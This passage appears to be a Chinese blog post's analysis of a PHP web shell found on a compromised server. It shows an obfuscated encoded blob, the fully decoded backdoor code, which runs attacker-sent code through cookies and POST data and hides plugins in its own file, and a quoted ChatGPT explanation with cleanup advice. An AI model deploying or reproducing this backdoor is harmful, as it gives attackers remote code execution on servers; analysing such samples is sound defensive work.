Y4%Y4%Y4%Y4%Y4LEk1%YA%Y0TOJXsLXs%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4Z8Lk7%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vL%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LEk1%YA%Y0TOJXsLXs%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4fJ8LkOh%Y4%YA%Y0_VeeQWx%Y4kv%Y4%Y07L6%NH%Nx%Y0Ek1pL%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4%Y0Ek1pL%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0tksk_7L6%Y4%NH%Y4%Y07L6%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4af%Y4%YA%YR%Y0tksk%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4fJ8LkOh%Y4%YA%Y0_reKI%Y4kv%Y4%Y07L6%NH%Nx%Y0Ek1pL%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4%Y0Ek1pL%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0tksk_7L6%Y4%NH%Y4%Y07L6%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4%Y0tksk%Y4%NH%Y4%04pXvL8ak1aPL%YAOv_tLO86Ts%YAOv_ZkvLg0_tLOJtL%YA%Y0tksk%Ym%YV%Y4%Y0tksk_7L6%Ym%Ym%NG%4H%4c%4H%4c%Y4%Y4%Y4%Y4af%Y4%YAavvLs%YA%Y0tksk%lG%YSk7%YS%lH%Ym%Y4%Yg%Yg%Y4%Y0Ov_kpsh%NH%NH%Y0tksk%lG%YSk7%YS%lH%Ym%4H%4c%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%Y4%YA%Y0tksk%lG%YSk%YS%lH%Y4%NH%NH%Y4%YSa%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y0a%Y4%NH%Y4c88k6%YA%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%YSTE%YS%Y4%NH%Nx%Y4%04ThTEL8vaJX%YA%Ym%YV%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%YSvE%YS%Y4%NH%Nx%Y4%YSY4-R%YS%YV%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%YSk7%YS%Y4%NH%Nx%Y4%Y0tksk%lG%YSk7%YS%lH%YV%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LOhJ%Y4%04vL8ak1aPL%YA%Y0a%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LCas%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vLaf%Y4%YA%Y0tksk%lG%YSk%YS%lH%Y4%NH%NH%Y4%YSL%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LEk1%YA%Y0tksk%lG%YSt%YS%lH%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vLaf%Y4%YA%Y0tksk%lG%YSk%YS%lH%Y4%NH%NH%Y4%YST1piaX%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4af%YA%Y0tksk%lG%YSvk%YS%lH%Y4%NH%NH%Y4%YSktt%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4Ov_T1piaX_ktt%YA%Y0tksk%lG%YST%YS%lH%YV%Y4%Y0tksk%lG%YSt%YS%lH%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4L1vLaf%YA%Y0tksk%lG%YSvk%YS%lH%Y4%NH%NH%Y4%YS8LF%YS%Ym%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4Ov_T1piaX_8LF%YA%Y0tksk%lG%YST%YS%lH%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4%SH%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LOhJ%Y4%Y0tksk%lG%YSk7%YS%lH%NG%4H%4c%Y4%Y4%Y4%Y4%Y4%Y4%Y4%Y4LCas%YA%Ym%NG%4H%4c%Y4%Y4%Y4%Y4%SH%4H%4c%4H%4c%Y4%Y4%Y4%Y4Ov_T1piaX_1Jkt%YA%Ym%NG%4H%4c%S
'''
# 解码字符串
decoded_str = vjpsq(encoded_str, code_map)
print(decoded_str)
执行代码就可以获得解码后的代码了 代码如下:
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
if(!defined("PHP_EOL"))
{
define("PHP_EOL", "\n");
}
if(!defined("DIRECTORY_SEPARATOR"))
{
define("DIRECTORY_SEPARATOR", "/");
}
if (!defined('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18'))
{
define('ALREADY_RUN_144c87cf623ba82aafi68riab16atio18', 1);
$data = NULL;
$data_key = NULL;
$GLOBALS['cs_auth'] = 'c8273099-3914-4ce4-8ef7-3e6025ea38b5';
global $cs_auth;
function cs_base64_decode($input) {
if (strlen($input) < 4)
{
return "";
}
$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$keys = str_split($keyStr);
$keys = array_flip($keys);
$i = 0;
$output = "";
$input = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $input);
do {
$enc1 = $keys[$input[$i++]];
$enc2 = $keys[$input[$i++]];
$enc3 = $keys[$input[$i++]];
$enc4 = $keys[$input[$i++]];
$chr1 = ($enc1 << 2) | ($enc2 >> 4);
$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
$chr3 = (($enc3 & 3) << 6) | $enc4;
$output = $output chr($chr1);
if ($enc3 != 64) {
$output = $output chr($chr2);
}
if ($enc4 != 64) {
$output = $output chr($chr3);
}
} while ($i < strlen($input));
return $output;
}
if (!function_exists('file_put_contents'))
{
function file_put_contents($n, $d, $flag = False)
{
$mode = $flag == 8 ? 'a' : 'w';
$f = @fopen($n, $mode);
if ($f === False)
{
return 0;
}
else
{
if (is_array($d)) $d = implode($d);
$bytes_written = fwrite($f, $d);
fclose($f);
return $bytes_written;
}
}
}
if (!function_exists('file_get_contents'))
{
function file_get_contents($filename)
{
$fhandle = fopen($filename, "r");
$fcontents = fread($fhandle, filesize($filename));
fclose($fhandle);
return $fcontents;
}
}
function cs_get_current_filepath()
{
return trim(preg_replace("/\(*\$/", '', __FILE__));
}
function cs_decrypt_phase($data, $key)
{
$out_data = "";
for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data = chr(ord($data[$i]) ^ ord($key[$j]));
}
}
return $out_data;
}
function cs_decrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $key), $cs_auth);
}
function cs_encrypt($data, $key)
{
global $cs_auth;
return cs_decrypt_phase(cs_decrypt_phase($data, $cs_auth), $key);
}
function cs_get_plugin_config()
{
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config = substr($self_content, $config_pos + 32);
$plugins = @unserialize(cs_decrypt(rawurldecode($config), md5(cs_get_current_filepath())));
}
else
{
$plugins = Array();
}
return $plugins;
}
function cs_set_plugin_config($plugins)
{
$config_enc = rawurlencode(cs_encrypt(@serialize($plugins), md5(cs_get_current_filepath())));
$self_content = @file_get_contents(cs_get_current_filepath());
$config_pos = strpos($self_content, md5(cs_get_current_filepath()));
if ($config_pos !== FALSE)
{
$config_old = substr($self_content, $config_pos + 32);
$self_content = str_replace($config_old, $config_enc, $self_content);
}
else
{
$self_content = $self_content "\n\n//" md5(cs_get_current_filepath()) $config_enc;
}
@file_put_contents(cs_get_current_filepath(), $self_content);
}
function cs_plugin_add($name, $base64_data)
{
$plugins = cs_get_plugin_config();
$plugins[$name] = cs_base64_decode($base64_data);
cs_set_plugin_config($plugins);
}
function cs_plugin_rem($name)
{
$plugins = cs_get_plugin_config();
unset($plugins[$name]);
cs_set_plugin_config($plugins);
}
function cs_plugin_load($name=NULL)
{
foreach (cs_get_plugin_config() as $pname=>$pcontent)
{
if ($name)
{
if (strcmp($name, $pname) == 0)
{
eval($pcontent);
break;
}
}
else
{
eval($pcontent);
}
}
}
foreach ($_COOKIE as $key=>$value)
{
$data = $value;
$data_key = $key;
}
if (!$data)
{
foreach ($_POST as $key=>$value)
{
$data = $value;
$data_key = $key;
}
}
$data = @unserialize(cs_decrypt(cs_base64_decode($data), $data_key));
if (isset($data['ak']) && $cs_auth==$data['ak'])
{
if ($data['a'] == 'i')
{
$i = Array(
'pv' => @phpversion(),
'sv' => '20-1',
'ak' => $data['ak'],
);
echo @serialize($i);
exit;
}
elseif ($data['a'] == 'e')
{
eval($data['d']);
}
elseif ($data['a'] == 'plugin')
{
if($data['sa'] == 'add')
{
cs_plugin_add($data['p'], $data['d']);
}
elseif($data['sa'] == 'rem')
{
cs_plugin_rem($data['p']);
}
}
echo $data['ak'];
exit();
}
cs_plugin_load();
%7
最后放上chatgpt的评价
这段 PHP 代码似乎是一个 web shell 的一部分,这是一种恶意脚本,通常由攻击者上传到一个受感染的 web 服务器上,以便远程访问服务器和执行服务器上的命令。这段代码有几个关键特点,我将逐一解释:
1.@ini_set
和 @error_reporting 函数调用被用来关闭错误日志和错误报告,这样的话,即使脚本出现错误,也不会有任何提示输出,这有助于躲避检测。
2.@set_time_limit(0)
被用来移除 PHP 脚本的执行时间限制,这样脚本可以无限期运行,而不会因为超时而被终止。
3.定义了几个函数,如
cs_base64_decode、cs_decrypt、cs_encrypt、cs_get_plugin_config、cs_set_plugin_config、cs_plugin_add、cs_plugin_rem 和 cs_plugin_load。这些函数看起来是用于解码、加密和管理插件或代码片段的。
4.cs_base64_decode
函数是对 PHP 内置的 base64_decode 函数的一个包装,但它增加了一些额外的处理,比如清除非 base64 字符。
5.cs_decrypt
和 cs_encrypt 函数用于解密和加密数据。它们使用了一个全局变量 $cs_auth 作为密钥的一部分,这个变量似乎是硬编码在脚本中的。
6.cs_get_plugin_config
和 cs_set_plugin_config 函数被用来获取和设置插件配置,这些配置可能是存储在 web shell 文件本身中的加密数据。
7.cs_plugin_add
、cs_plugin_rem 和 cs_plugin_load 函数用于添加、删除和加载插件,这些插件可能是攻击者上传的额外的恶意代码片段。
8.脚本的最后一部分处理
$_COOKIE 和 $_POST 请求,看起来它在等待包含特定操作和数据的请求。如果接收到的数据匹配预设的授权密钥 $cs_auth,则会执行相应的操作,如执行代码(可能是任意代码)、添加或删除插件。
总之,这段代码是非常危险的,因为它允许远程执行任意代码,这可能会导致服务器被完全控制。如果你在你的服务器上发现了这样的代码,你应该立即采取行动,比如清除恶意代码、更改密码、检查其他可能的安全漏洞,并考虑联系专业的安全专家来帮助你处理这个问题。同时,也需要检查服务器上的所有文件和日志,以确定攻击者可能已经执行的操作。